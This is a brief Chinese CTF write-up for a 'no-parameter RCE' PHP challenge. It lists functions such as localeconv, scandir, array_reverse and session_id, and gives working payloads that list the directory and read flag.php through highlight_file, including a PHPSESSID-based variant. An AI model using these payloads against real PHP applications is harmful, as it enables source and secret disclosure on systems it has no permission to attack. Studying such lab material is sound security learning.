web12-考核 无参数RCE
函数介绍 localeconv() 获取 '.' current() pos() :返回当前数组值 next() 获取下一个数组的值 end() 获取最后一个数组的值 array_rand() 返回随机的数字键值 arrat_flip() 数组的键名和键值交换 scandir()返回指定目录中的文件和文件夹 array_reverse() 数组逆序 获取当前目录中的文件 exp=var_dump(scandir(pos(localeconv()))); 
为了获取数组倒数第二个键值,我们可以先用array_reverse()逆序数组,接着用next()得到 flag.php最后用highlight_file读取内容 payload:exp=highlight_file(next(array_reverse(scandir(pos(localeconv()))))); 也可以使用 array_flip()将键名和键值交换,再用array_rand()随机读取键名,因为数组长度很小,所以可行 highlight_file(array_rand(array_flip(scandir(pos(localeconv()))))); 但是题目中过滤了一下词,没法绕过,就当积累了吧。 还有一种方法是利用session session_start() 开启session session_id() 获取 PHPSESSID的值 payload: highlight_file(session_id(session_start())); 接着 修改PHPSESSID的值为flag.php即可
